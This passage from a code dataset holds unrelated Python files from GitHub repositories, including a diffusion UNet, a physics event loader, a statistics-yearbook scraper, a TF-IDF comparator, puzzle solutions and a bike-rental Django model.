nn.Conv2d(64, 32, kernel_size=5, padding=2),\n nn.Conv2d(32, out_channels, kernel_size=5, padding=2),\n ]\n )\n self.act = nn.SiLU()\n self.downscale = nn.MaxPool2d(2)\n self.upscale = nn.Upsample(scale_factor=2)\n\n def forward(self, x):\n h = []\n for i, l in enumerate(self.down_layers):\n x = self.act(l(x))\n if i < 2:\n h.append(x)\n x = self.downscale(x)\n\n for i, l in enumerate(self.up_layers):\n if i > 0:\n x = self.upscale(x)\n x += h.pop()\n x = self.act(l(x))\n\n return x","repo_name":"HamzaYousVision/transformers-in-vision","sub_path":"diffusion_models/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"16141346320","text":"import os\nfrom .ReadBinary import ReadBlock as rb\nfrom .ReadText import ReadFile as rt\nimport traceback\nimport numpy as np\n\n\nfull_loadlist = ['fastDAQ', 'slowDAQ', 'PMTtraces', 'event',\n 'camdata', 'images', 'DAQsetings']\n\n\ndef GetEvent(rundirectory, ev, *loadlist, max_file_size=None):\n event = dict()\n event_dir = os.path.join(rundirectory, str(ev))\n for key in full_loadlist:\n event[key] = dict(loaded=False)\n\n neglist = False\n if len(loadlist) == 0:\n loadlist = full_loadlist\n elif len(loadlist[0]) > 0 and loadlist[0][0:1] == '~':\n neglist = True\n\n if ('fastDAQ' in loadlist) or (neglist and '~fastDAQ' not in loadlist):\n i_file = 0\n while True:\n\n binfile = os.path.join(event_dir,\n 'fastDAQ_' + str(i_file) + '.bin')\n calfile = os.path.join(event_dir,\n 'fastDAQ_' + str(i_file) + '_cal.txt')\n\n if not (os.path.exists(binfile) and os.path.exists(calfile)):\n break\n\n try:\n d_bin = rb(binfile, max_file_size=max_file_size)\n d_cal = rt(calfile)\n d = dict()\n for key in d_bin:\n d[key] = d_bin[key] * d_cal[key + '_multiplier'] + \\\n d_cal[key + '_offset']\n if 'time' in d_bin:\n print(\"Whoa, there's a field named time in fastDAQ_\" +\n str(i_file))\n d['time'] = (range(d[list(d.keys())[0]].size) -\n d_cal['pretrigger_samples']) * d_cal['dt']\n if 'bindata' in d_bin:\n print(\"Whoa, there's a field named bindata in fastDAQ_\" +\n str(i_file))\n d['bindata'] = d_bin\n if 'caldata' in d_bin:\n print(\"Whoa, there's a field named caldata in fastDAQ_\" +\n str(i_file))\n d['caldata'] = d_cal\n\n except:\n print('Failed to load fastDAQ_' + str(i_file))\n traceback.print_exc()\n break\n\n if i_file == 0:\n event['fastDAQ'] = d\n event['fastDAQ']['multiboards'] = [d]\n else:\n event['fastDAQ']['multiboards'].append(d)\n\n event['fastDAQ']['loaded'] = True\n i_file += 1\n\n if ('slowDAQ' in loadlist) or (neglist and '~slowDAQ' not in loadlist):\n try:\n d = rt(os.path.join(event_dir, 'slowDAQ_0.txt'))\n event['slowDAQ'] = d\n event['slowDAQ']['loaded'] = True\n except:\n print('Failed to load slowDAQ_0.txt')\n traceback.print_exc()\n\n if ('PMTtraces' in loadlist) or (neglist and '~PMTtraces' not in loadlist):\n try:\n d = rb(os.path.join(event_dir, 'PMTtraces.bin'), max_file_size=max_file_size)\n event['PMTtraces'] = d\n event['PMTtraces']['loaded'] = True\n except:\n print('Failed to load PMTtraces')\n traceback.print_exc()\n\n\n if ('event' in loadlist) or (neglist and '~event' not in loadlist):\n try:\n with open(os.path.join(event_dir, 'Event.txt'), 'r') as ev_txt:\n ev_str = next(ev_txt)\n ev_dat = ev_str.split()\n event['event']['run_type'] = np.int32(ev_dat[2])\n event['event']['trigger_main'] = np.int32(ev_dat[3])\n event['event']['trigger_cameras'] = np.int32(ev_dat[4])\n event['event']['trigger_PLC'] = np.int32(ev_dat[5])\n event['event']['trigger_slowDAQ'] = np.int32(ev_dat[6])\n event['event']['timestamp'] = np.float64(ev_dat[7])\n event['event']['mstick'] = np.int64(ev_dat[8])\n event['event']['Pset'] = np.float64(ev_dat[9])\n event['event']['livetime'] = np.float64(ev_dat[10])\n event['event']['loaded'] = True\n except:\n print('Failed to load Event')\n traceback.print_exc()\n\n return event\n","repo_name":"SBC-Collaboration/SBC-Analysis","sub_path":"DataHandling/GetSBCEvent.py","file_name":"GetSBCEvent.py","file_ext":"py","file_size_in_byte":4096,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"}
+{"seq_id":"17074534284","text":"# -*- coding: utf-8 -*- \n\n\nimport time\nfrom util.utilis import *\nfrom util.logger import Logger\nimport os\nfrom selenium import webdriver\nimport requests\nfrom bs4 import BeautifulSoup\nimport time\nfrom util.utilis import *\nimport os.path as osp\n\ninfo_log = Logger('../log/guizhou_info.log','info')\nerror_log = Logger('../log/guizhou_error.log','info')\ninfo_log.logger.info('开始爬取数据了')\nerror_log.logger.error('请检查网络设置,目前断线')\nfrom bs4 import BeautifulSoup\nyear_list = sorted(list(range(2010,2020,1)),reverse =True)\ndownload_dir = os.path.abspath('./data')\noptions = webdriver.ChromeOptions()\nprefs = { 'download.default_directory': download_dir}\noptions.add_experimental_option('prefs', prefs)\ndriver = webdriver.Chrome(chrome_options=options)\n\ndef write_json(json_fn, json_dict):\n if not os.path.exists(json_fn):\n write_list = [json_dict]\n else:\n write_list = read_json(json_fn)\n write_list.append(json_dict)\n with open(json_fn, \"w\",encoding='utf-8') as f:\n json.dump(write_list, f, ensure_ascii=False,indent=4)\ndef getDonwLoadFileName(download_path, filaname, timing):\n '''\n 用于检查文件是否下载完成,当下载完成时会从这个函数跳出\n\n :param download_path: chromeDiver默认下载文件的位置\n :param row: 字典形式,由页面解析生成的,负责提供下载的文件名称信息\n :return:\n '''\n\n # document_name_zip = row['文件名称']+'.zip'\n # document_name_rar = row['文件名称']+'.rar'\n # check_down_load_path_zip = os.path.join(download_path,document_name_zip)\n # check_down_load_path_rar = os.path.join(download_path, document_name_rar)\n time_hold = 0\n while True:\n # if os.path.exists(check_down_load_path_zip):\n # document_name = document_name_zip\n # break\n # if os.path.exists(check_down_load_path_rar):\n # document_name = document_name_rar\n # break\n try:\n newest_file = newest_filename(download_path)\n finished_time = os.path.getatime(os.path.join(download_path, newest_file))\n except:\n newest_file = ''\n finished_time = 0\n if timing <= finished_time and 'download' not in newest_file and '.tmp' not in newest_file :\n time.sleep(1)\n return newest_file\n time.sleep(1)\n time_hold += 1\n if time_hold >= 50:\n error_log.logger.error('如果文件没下载完,按任意键继续;如果网络问题,请输入 quit 退出')\n a = input()\n if a == 'quit':\n return a\n # time.sleep(0.5)\n # return document_name\n\n\ndef newest_filename(path_file):\n '''\n 给定文件目录,返回最新下载的文件信息\n Args:\n path_file:文件目录\n\n Returns: File_Path\n\n '''\n lists = os.listdir(path_file)\n lists.sort(key=lambda fn: os.path.getmtime(path_file + '\\\\' + fn))\n\n return lists[-1]\n\n\n\n\ndef main():\n\n if os.path.exists('shanxi.json'):\n json_list = read_json('shanxi.json')\n else:\n json_list = []\n url_list = [\n 'http://tjj.shaanxi.gov.cn/upload/n2020/indexce.htm',\n 'http://tjj.shaanxi.gov.cn/upload/2020/pro/3sxtjnj/zk/indexce.htm',\n 'http://tjj.shaanxi.gov.cn/upload/201802/zk/indexce.htm','http://tjj.shaanxi.gov.cn/upload/2018/7/zk/indexce.htm',\n 'http://tjj.shaanxi.gov.cn/upload/2016/tongjinianj2016/2016/indexce.htm','http://tjj.shaanxi.gov.cn/upload/2016/tongjinianj/2015/indexce.htm',\n 'http://tjj.shaanxi.gov.cn/upload/2014/indexce.htm','http://tjj.shaanxi.gov.cn/upload/2013/indexce.htm',\n 'http://tjj.shaanxi.gov.cn/upload/2012/indexce.htm','http://tjj.shaanxi.gov.cn/upload/2011/indexce.htm',\n 'http://tjj.shaanxi.gov.cn/upload/2010/indexce.htm'\n ]\n for year,base_url in zip(year_list,url_list):\n\n # base_url = 'http://tjj.shaanxi.gov.cn/upload/{}/zk/indexce.htm'.format(2018)\n driver.get(base_url)\n driver.switch_to.frame(1)\n html = driver.page_source\n soup = BeautifulSoup(html, 'html.parser')\n # download_list = driver.find_elements_by_xpath(\"//table[@id='fileListTable']//a\")\n ####整个目录\n topic_list = soup.find_all('li',attrs = {'id':'foldheader'})\n\n\n for topic in topic_list:\n if topic.text == '统计图' or topic.text == '附录':\n continue\n topic_str = ''.join(topic.text.split('、')[-1].split())\n try:\n file_list = topic.find_parent().find_next_sibling('ul',attrs = {'id':'foldinglist'}).find_all('li')\n except:\n file_list = topic.find_next_sibling('ul',attrs = {'id':'foldinglist'}).find_all('li')\n tongming_num = 1\n previous_file_name = ''\n for file in file_list:\n if 'xls' in file.a.get('href') or 'xlrx' in file.a.get('href'):\n file_json = {}\n file_json['topic'] = topic_str\n file_json['info'] = {}\n\n click_name = file.text\n if len(click_name.split())>1:\n raw_file_name = click_name.split()[0]\n cur_file_name = ' '.join(click_name.split()[1:])\n else:\n raw_file_name = click_name.split()[0]\n cur_file_name = click_name.split()[-1]\n\n if '续表' in cur_file_name:\n cur_file_name = previous_file_name +'_'+ cur_file_name.replace('续表','')\n elif previous_file_name == cur_file_name:\n cur_file_name = cur_file_name + '_' + str(tongming_num)\n tongming_num += 1\n else:\n previous_file_name = cur_file_name\n tongming_num = 1\n cur_file_name = str(year)+ '_' + cur_file_name\n cur_time = time.time()\n click_button = driver.find_element_by_xpath(\"//*[text()='{}']\".format(click_name))\n click_button.click()\n latestDownloadedFileName = getDonwLoadFileName(download_dir, raw_file_name, cur_time)\n\n if latestDownloadedFileName == 'quit':\n continue\n\n path = osp.join(download_dir, latestDownloadedFileName)\n\n if osp.exists(path):\n pass\n else:\n info_log.logger('不��在这个文件:'+path)\n continue\n # raise ValueError('这文件都不存在啊')\n\n pre_name, format_name = latestDownloadedFileName.split('.')\n # new_name = cur_file_name + '.' + format_name\n newpath = osp.join(download_dir, cur_file_name + '.' + format_name)\n # try:\n time.sleep(1)\n if osp.exists(newpath):\n info_log.logger.info('已经保存过这个文件了,不保存了哦!')\n continue\n os.rename(path, newpath)\n if osp.exists(newpath) and not osp.exists(path):\n info_log.logger.info('已保存:'+newpath)\n else:\n error_log.logger.error('!!!!!!!!!!!!!!!!!没找到:'+ newpath)\n error_time = 0\n while(True):\n time.sleep(1)\n error_time +=1\n if not osp.exists(path):\n break\n if error_time >=50:\n error_log.logger.error('真的rename不到文件诶')\n continue\n\n\n # time.sleep(5)\n # os.rename(path, newpath)\n # raise ValueError('这文件都不存在啊')\n # except:\n # time.sleep(2)\n # os.rename(path, newpath)\n file_json['name'] = cur_file_name\n json_list.append(file_json)\n with open('../info/shanxi.json', \"w\", encoding='utf-8') as f:\n json.dump(json_list, f, ensure_ascii=False, indent=4)\n\n del cur_file_name\n\nif __name__ == '__main__':\n main()\n","repo_name":"Gyhfresh/web-crawler-master","sub_path":"yearbook/shaanxi.py","file_name":"shaanxi.py","file_ext":"py","file_size_in_byte":8630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"27440137180","text":"import pandas as pd\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom pipeline.comparators import BaseComparator\nimport faiss\n\n\nclass TFIDFComparator(BaseComparator):\n def compare(self, query_document, documents, num_results=10):\n # Combine title and text to create documents for TF-IDF\n documents_str = documents[\"title\"] + \" \" + documents[\"text\"]\n\n # Vectorize the documents using TF-IDF\n tfidf_vectorizer = TfidfVectorizer()\n tfidf_matrix = tfidf_vectorizer.fit_transform(documents_str)\n\n # Convert TF-IDF matrix to dense vectors for FAISS\n dense_tfidf_matrix = tfidf_matrix.toarray()\n\n # Build FAISS index\n index = faiss.IndexFlatL2(dense_tfidf_matrix.shape[1])\n index.add(dense_tfidf_matrix)\n\n # Transform and preprocess the query document\n query_tfidf_vector = tfidf_vectorizer.transform([query_document]).toarray()\n\n num_results = min(num_results, len(documents_str))\n\n # Perform similarity search using FAISS\n distances, indices = index.search(query_tfidf_vector, num_results)\n\n # Retrieve the most similar documents from your DataFrame based on indices\n return documents.iloc[indices[0]]\n\n\nif __name__ == '__main__':\n test_document = \"Coronavirus was first discovered in Wuhan, China in 2019.\"\n\n documents = pd.DataFrame(columns=[\"title\", \"text\"])\n documents.loc[0] = [\"Trump\", \"Trump is the former president of the United States\"]\n documents.loc[1] = [\"Coronavirus\", \"Coronavirus is a virus that causes COVID-19\"]\n documents.loc[2] = [\"Biden\", \"Biden is the current president of the United States\"]\n\n comparator = TFIDFComparator()\n print(comparator.compare(test_document, documents))\n","repo_name":"Weikang01/fake_news_detector","sub_path":"pipeline/comparators/tfidf_comparator.py","file_name":"tfidf_comparator.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"70732506087","text":"#!/usr/bin/env python3\n\nimport sys\n\nFINAL_POSITION = 4086\nDECK_SIZE = 10007\n\nDEAL_INC=\"deal with increment \"\nNEW_STACK=\"deal into new stack\"\nCUT=\"cut \"\n\ndef parse(l):\n if l.startswith(DEAL_INC):\n return (deal, [int(l[len(DEAL_INC):])])\n elif l.startswith(NEW_STACK):\n return (new_stack, [])\n elif l.startswith(CUT):\n return (cut, [int(l[len(CUT):])])\n else:\n sys.stderr.write(\"Parse error ! {}\\n\".format(l))\n\ndef new_stack(params):\n a,b = params\n return (-a, -b - 1)\n\ndef cut(params, n):\n a,b = params\n return (a, b - n)\n\ndef deal(params, n):\n a,b = params\n return (n * a, n * b)\n\nwith open(\"day22_i.txt\") as f:\n shuffle = [parse(l) for l in f.readlines()]\n\nab = (1, 0)\nfor op, arg in shuffle:\n ab = op(ab, *arg)\n ab = (ab[0] % DECK_SIZE, ab[1] % DECK_SIZE)\n\nprint(\"Deck shuffler equation : {} * x + {} [{}]\".format(ab[0], ab[1], DECK_SIZE))\nprint(\"Position of card 2019 after shuffling a small deck : {}\".format(\n ((ab[0] * 2019 + ab[1]) % DECK_SIZE)))\n\n\nprint(\"Upping the ante\")\nDECK_SIZE=119315717514047\nSHUFFLE_COUNT=101741582076661\nFINAL_POS=2020\n\nprint(\"New deck size : {}\".format(DECK_SIZE))\nab = (1, 0)\nfor op, arg in shuffle:\n ab = op(ab, *arg)\n ab = (ab[0] % DECK_SIZE, ab[1] % DECK_SIZE)\n\nprint(\"1xDeck shuffler equation : {} * x + {} [{}]\".format(ab[0], ab[1], DECK_SIZE))\ninv = (pow(ab[0], -1, mod=DECK_SIZE), (-ab[1] % DECK_SIZE))\nprint(\"Inverse equation : - {} * {}\".format(inv[1], inv[0]))\n\nprint(\"Position of card 2019 after shuffling a big deck once : {}\".format(\n ((ab[0] * FINAL_POS + ab[1]) % DECK_SIZE)))\npos = (ab[0] * 2019 + ab[1]) % DECK_SIZE\nant = ((pos + inv[1]) * inv[0]) % DECK_SIZE\nprint(\"Trying to revert ? {}\".format(ant))\npos = (ab[0] * pos + ab[1]) % DECK_SIZE\nprint(\"Twice : {}\".format(pos))\nant = ((pos + inv[1]) * inv[0]) % DECK_SIZE\nant = ((ant + inv[1]) * inv[0]) % DECK_SIZE\nprint(\"Revert twice: {}\".format(ant))\n\ndef rev(pos, it, ab):\n r = (pow((1 - ab[0]), -1, DECK_SIZE) * ab[1]) % DECK_SIZE\n a_n = pow(ab[0], -it, mod=DECK_SIZE)\n inv = ((pos - r) * a_n + r) % DECK_SIZE\n return inv\n\nprint(\"Trying to generic revert twice ? {}\".format(rev(15965746545382, 2, ab)))\n\n# Finally\nprint(\"Trying to revert ? {}\".format(rev(2020, SHUFFLE_COUNT, ab)))\n","repo_name":"ey3ball/adventofcode2019","sub_path":"day22/day22_2.py","file_name":"day22_2.py","file_ext":"py","file_size_in_byte":2286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"32133240297","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# https://www.hackerrank.com/challenges/max-array-sum\n\n# Using tabulation (bottom up approach) \n# Note that in the dp dictionary, we store the max sum for the subarray up till the length of the subarray. Hence, we simply return the last item in this dictionary to get the answer\n\ndef maxSubsetSum(arr):\n dp = {} # key : max index of subarray, value = sum\n dp[0], dp[1] = arr[0], max(arr[0], arr[1])\n for i, num in enumerate(arr[2:], start=2):\n dp[i] = max(dp[i-1], dp[i-2]+num, dp[i-2], num)\n return dp[len(arr)-1]\n \nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n n = int(input())\n\n arr = list(map(int, input().rstrip().split()))\n\n res = maxSubsetSum(arr)\n\n fptr.write(str(res) + '\\n')\n\n fptr.close()\n","repo_name":"Bidek56/HackerRank","sub_path":"Python/max-array-sum.py","file_name":"max-array-sum.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"39874546510","text":"#!/usr/bin/python3\n\nimport yarp\nimport sys\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport pyqtgraph as pg\nimport pyqtgraph.opengl as gl\nfrom pyqtgraph.Qt import QtGui, QtCore\nimport numpy as np\nimport os\nimport pickle\n\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '../../../../ergonomic_assessment/src/')))\n\nimport AE\nimport tools\nfrom Skeleton import Skeleton\nfrom ErgoAssessment import ErgoAssessment\nfrom HumanPosture import HumanPosture\n\nclass RealTimePlotModule():\n\t\"\"\"\n\tThis module plots a bar chart with the probability distribution on the states.\n\tUsage\n\tpython plot_probabilities.py\n\tInput port: /processing/NamePort:o\n\t\"\"\"\n\tdef __init__(self):\n\t\tself.app = pg.mkQApp()\n\t\tpg.setConfigOption('background', 'w')\n\t\tpg.setConfigOption('foreground', 'k')\n\n\t\tself.view = pg.PlotWidget()\n\t\tself.view.resize(800, 600)\n\t\tself.view.setWindowTitle('Ergonomic score in latent space')\n\t\tself.view.setAspectLocked(True)\n\t\tself.view.show()\n\n\t\tself.port = yarp.BufferedPortBottle()\n\t\tself.port.open('/plot_latentspace')\n\n\t\tmetric = 'jointAngle'\n\t\tergo_name = ['TABLE_REBA_C']\n\n\t\tsize_latent = 2\n\t\tdx = 0.1\n\n\t\tloss = [[]]\n\t\tautoencoder = []\n\n\t\tall_score = []\n\t\tall_size = []\n\t\ttype_data = []\n\t\tpath_src = \"/home/amalaise/Documents/These/code/ergo_prediction/ergonomic_assessment/src/\"\n\t\tpath = path_src + \"save/AE/\" + metric + \"/\" + str(size_latent) + '/'\n\t\tlist_files = [f for f in os.listdir(path) if os.path.isfile(os.path.join(path, f))]\n\t\tlist_files.sort()\n\t\tfile = list_files[0]\n\n\t\twith open(path + file, 'rb') as input:\n\t\t\tautoencoder = pickle.load(input)\n\n\t\tinput_data = autoencoder.get_data_test()\n\t\tdata_output, encoded_data, score = autoencoder.test_model(input_data)\n\t\tscore = autoencoder.evaluate_model(input_data, data_output, metric)\n\t\t\n\t\tMax = np.max(encoded_data, axis = 0)\n\t\tMin = np.min(encoded_data, axis = 0)\n\t\tMean = np.mean(encoded_data, axis = 0)\n\n\t\t# Compute ergo score\n\t\tergo_assessment = ErgoAssessment(path_src + 'config/rula_config.json')\n\t\tlist_ergo_score = ergo_assessment.get_list_score_name()\n\t\tlist_ergo_score.sort()\n\n\t\treduce_posture = HumanPosture(path_src + 'config/mapping_joints.json')\n\t\tposture = Skeleton('dhm66_ISB_Xsens.urdf')\n\n\t\tself.X = np.arange(0.0, 1.0+dx, dx)\n\n\t\tself.ergo_grid = np.zeros((len(self.X), len(self.X)))\n\n\t\tfor i, data_x in enumerate(self.X):\n\t\t\tfor j, data_y in enumerate(self.X):\n\n\t\t\t\tx = np.zeros((1,size_latent))\n\t\t\t\tx[0, 0] = data_x\n\t\t\t\tx[0, 1] = data_y\n\n\t\t\t\tdecoded_data = autoencoder.decode_data(x)\n\t\t\t\tif metric == 'posture':\n\t\t\t\t\twhole_body = reduce_posture.reduce2complete(decoded_data[0])\n\t\t\t\t\tposture.update_posture(whole_body)\n\t\t\t\telse:\n\t\t\t\t\tposture.update_posture(decoded_data[0])\n\n\t\t\t\tergo_score = tools.compute_sequence_ergo(decoded_data[0], 0, ergo_name, path_src)[0]\n\t\t\t\tif ergo_score == 1:\n\t\t\t\t\tergo_score = 1\n\t\t\t\telif 1 < ergo_score < 5:\n\t\t\t\t\tergo_score = 2\n\t\t\t\telif 4 < ergo_score < 6:\n\t\t\t\t\tergo_score = 3\n\t\t\t\telse:\n\t\t\t\t\tergo_score = 4\n\n\t\t\t\tself.ergo_grid[j,i] = ergo_score\n\n\t\tself.flag = 0\n\n\t\tself.plot_latent_space()\n\n\n\tdef plot_latent_space(self, x=0, y=0):\n\t\tif self.flag:\n\t\t\tself.view.removeItem(self.scatter)\n\t\telse:\n\t\t\tself.flag = 1\n\n\t\tself.scatter = pg.ScatterPlotItem(pen=pg.mkPen(width=10, color='r'), symbol='o', size=1)\n\t\tplot_traj = pg.PlotItem(pen=pg.mkPen(width=5, color='r'), size=1)\n\n\t\timg_np = np.rot90(np.rot90(np.rot90(self.ergo_grid)))\n\t\t\n\t\timg = pg.ImageItem(img_np)\n\n\t\tself.scatter.setData(x=[x], y=[y])\n\t\tplot_traj.setData(x, y)\n\n\t\timg.setZValue(-100)\n\t\tself.view.addItem(img)\n\t\tself.view.addItem(self.scatter)\n\t\t\n\t\n\tdef update(self):\n\t\tb_in = self.port.read()\n\t\tdata = b_in.toString().split(' ')\n\n\t\tdel data[0]\n\n\t\tdata = list(map(float, data))\n\t\tdata = np.asarray(data)\n\n\t\tself.plot_latent_space(x=data[0]*len(self.X), y=len(self.X)-data[1]*len(self.X))\n\n\t\tQtGui.QApplication.processEvents()\n\n\t\treturn\n\n\tdef close(self):\n\t\tyarp.Network.disconnect(self.input_port, self.port.getName())\n\t\tself.port.close()\n\t\tsys.exit(self.app.exec_())\n\n\nif __name__==\"__main__\":\n\tyarp.Network.init()\n\trf = yarp.ResourceFinder()\n\trf.configure(sys.argv)\n\n\tfig = RealTimePlotModule()\n\n\twhile(True):\n\t\ttry:\n\t\t\tfig.update()\n\t\t\ti = 0\n\t\texcept KeyboardInterrupt:\n\t\t\tfig.close()\n\t\t\tbreak\n\n","repo_name":"inria-larsen/ergo_prediction","sub_path":"Modules/online_assessment/visualisation/src/plt_latent_space_online.py","file_name":"plt_latent_space_online.py","file_ext":"py","file_size_in_byte":4225,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"18548543930","text":"from Data_Structures.graph.graph import Graph, Vertex\n\ndef test_breadth_fisrt_graph():\n g = Graph()\n node1 = g.add_node('node1')\n node2 = g.add_node('node2')\n g.add_edge(node1,node2)\n assert g.breadth_first_search(node1) == ['node1','node2']\n\ndef test_breadth_first_graph():\n g = Graph()\n node1 = g.add_node('a')\n node2 = Vertex('s')\n assert g.breadth_first_search(node2) == \"Start node does not exist\"\n","repo_name":"mhn998/-data-structures-and-algorithms","sub_path":"python/tests/challenges/test_bfs_graph.py","file_name":"test_bfs_graph.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"42498649585","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport cv2\n\ndef padding(img, h, w, h_, w_):\n h1 = int((h_-h)/2)\n h2 = int((h_-h)/2) + h\n w1 = int((w_-w)/2)\n w2 = int((w_-w)/2) + w\n img_pad = np.ones([h_,w_,3])*255\n img_pad[h1:h2, w1:w2, :] = img\n return img_pad\n\ndef resizeImage(img, h_, w_):\n h, w = img.shape[:2]\n if w < w_ and h < h_:\n img = padding(img, h, w, h_, w_)\n \n elif w >= w_ and h < h_:\n new_w = w_\n new_h = int(h*new_w/w)\n new_img = cv2.resize(img, (new_w, new_h), interpolation = cv2.INTER_AREA)\n img = padding(new_img, new_h, new_w, h_, w_)\n \n elif w < w_ and h >= h_:\n new_h = h_\n new_w = int(w*new_h/h)\n new_img = cv2.resize(img, (new_w, new_h), interpolation = cv2.INTER_AREA)\n img = padding(new_img, new_h, new_w, h_, w_)\n \n else:\n r = max(w/w_, h/h_)\n new_w = max(min(w_, int(w / r)), 1)\n new_h = max(min(h_, int(h / r)), 1)\n new_img = cv2.resize(img, (new_w, new_h), interpolation = cv2.INTER_AREA)\n img = padding(new_img, new_h, new_w, h_, w_)\n \n return img\n\ndef preprocess(path, h, w):\n img = cv2.imread(path)\n img = resizeImage(img, h, w)\n img = np.clip(img, 0, 255)\n img = np.uint8(img)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n img = img.astype(np.float32)\n img = img/255\n return img","repo_name":"TismeetSingh14/HTR_V1","sub_path":"Preprocessor.py","file_name":"Preprocessor.py","file_ext":"py","file_size_in_byte":1391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"1815907303","text":"import json\nimport os\nimport sys\nimport codecs\nimport random\n\nstdout_encoding = sys.stdout.encoding or sys.getfilesystemencoding()\n\nf = codecs.open(\"wordlist.json\", \"r\",'utf-8')\nf2 = codecs.open(\"wordlist2_clean.json\", \"r\",'utf-8')\nf3 = codecs.open(\"wordlist3_clean.json\", \"r\",'utf-8')\n\nwordlist = json.load(f)\nwordlist2 = json.load(f2)\nwordlist3 = json.load(f3)\n\nl = list(wordlist3.keys())\n\n# for i in l:\n# if i in wordlist or i in wordlist2:\n# del wordlist3[i]\n\nc1 = [\"#db5e5e\", \"#db7d5e\", \"#dba15e\", \"#dbb85e\", \"#dbd75e\", \"#9ddb5e\"]\nc2 = [\"#5edbd5\", \"#5ea3db\", \"#5e75db\", \"#2d6acc\", \"#2248f2\", \"#7222f2\"]\nc3 = [\"#db40de\", \"#de4094\", \"#9c2754\", \"#9c2744\", \"#c42f4f\", \"#c42f2f\"]\n\nfor i in wordlist:\n wordlist[i][\"seen\"] = 0\n wordlist[i][\"mastered\"] = 0\n wordlist[i][\"color\"] = random.choice(c1)\n\nfor i in wordlist2:\n wordlist2[i][\"seen\"] = 0\n wordlist2[i][\"mastered\"] = 0\n wordlist2[i][\"color\"] = random.choice(c2)\n\nfor i in wordlist3:\n wordlist3[i][\"seen\"] = 0\n wordlist3[i][\"mastered\"] = 0\n wordlist3[i][\"color\"] = random.choice(c3)\n\nprint(wordlist3)","repo_name":"keshav99/personalsite","sub_path":"german/flashcards/clean_jsons.py","file_name":"clean_jsons.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"27199906692","text":"import uuid\n\nimport requests\nfrom django.conf import settings\nfrom django.contrib.gis.measure import D\nfrom django.db import models\nfrom django.db.utils import IntegrityError\nfrom django.dispatch import receiver\nfrom django.utils.timezone import now\nfrom preferences import preferences\n\nfrom cykel.models import CykelLogEntry\n\nfrom .bike import Bike\nfrom .lock_type import LockType\nfrom .station import Station\n\n\nclass Rent(models.Model):\n rent_start = models.DateTimeField()\n rent_end = models.DateTimeField(default=None, null=True, blank=True)\n start_location = models.ForeignKey(\n \"Location\",\n default=None,\n on_delete=models.PROTECT,\n null=True,\n blank=True,\n related_name=\"%(class)s_start_location\",\n )\n start_station = models.ForeignKey(\n \"Station\",\n default=None,\n on_delete=models.PROTECT,\n null=True,\n blank=True,\n related_name=\"%(class)s_start_station\",\n )\n end_location = models.ForeignKey(\n \"Location\",\n default=None,\n on_delete=models.PROTECT,\n null=True,\n blank=True,\n related_name=\"%(class)s_end_location\",\n )\n end_station = models.ForeignKey(\n \"Station\",\n default=None,\n on_delete=models.PROTECT,\n null=True,\n blank=True,\n related_name=\"%(class)s_end_station\",\n )\n bike = models.ForeignKey(\"Bike\", default=None, on_delete=models.PROTECT)\n user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.PROTECT)\n\n def __repr__(self):\n return \"\"\"Rent #{id}: Bike {bike} for User '{user}'\\n rented {rent_start}\n from {start_location}/{start_station}\\n return {rent_end}\n at {end_location}/{end_station}\"\"\".format(\n id=self.id,\n bike=self.bike,\n user=self.user,\n start_location=self.start_location,\n start_station=self.start_station,\n rent_start=self.rent_start,\n end_location=self.end_location,\n end_station=self.end_station,\n rent_end=self.rent_end,\n )\n\n def unlock(self):\n if self.bike.lock is None:\n return {}\n\n lock = self.bike.lock\n lock_type = lock.lock_type\n\n if lock_type is None:\n return {}\n\n if lock_type.form_factor == LockType.FormFactor.COMBINATION_LOCK:\n return {\"unlock_key\": self.bike.lock.unlock_key}\n\n if lock_type.form_factor == LockType.FormFactor.ELECTRONIC_LOCK:\n url = \"{url}/{device_id}/unlock\".format(\n url=lock_type.endpoint_url, device_id=lock.lock_id\n )\n r = requests.post(url)\n data = r.json()\n return {\"data\": data}\n\n return {}\n\n def end(self, end_location=None, force=False):\n self.rent_end = now()\n if end_location:\n self.end_location = end_location\n elif self.bike.public_geolocation():\n self.end_location = self.bike.public_geolocation()\n\n self.save()\n\n if self.end_location:\n # attach bike to station if location is closer than X meters\n # distance is configured in preferences\n max_distance = preferences.BikeSharePreferences.station_match_max_distance\n station_closer_than_Xm = Station.objects.filter(\n location__distance_lte=(self.end_location.geo, D(m=max_distance)),\n status=Station.Status.ACTIVE,\n ).first()\n if station_closer_than_Xm:\n self.bike.current_station = station_closer_than_Xm\n self.end_station = station_closer_than_Xm\n self.save()\n else:\n self.bike.current_station = None\n\n # set Bike status back to available\n self.bike.availability_status = Bike.Availability.AVAILABLE\n self.bike.save()\n try:\n # set new non static bike ID, so for GBFS observers can not track this bike\n self.bike.non_static_bike_uuid = uuid.uuid4()\n self.bike.save()\n except 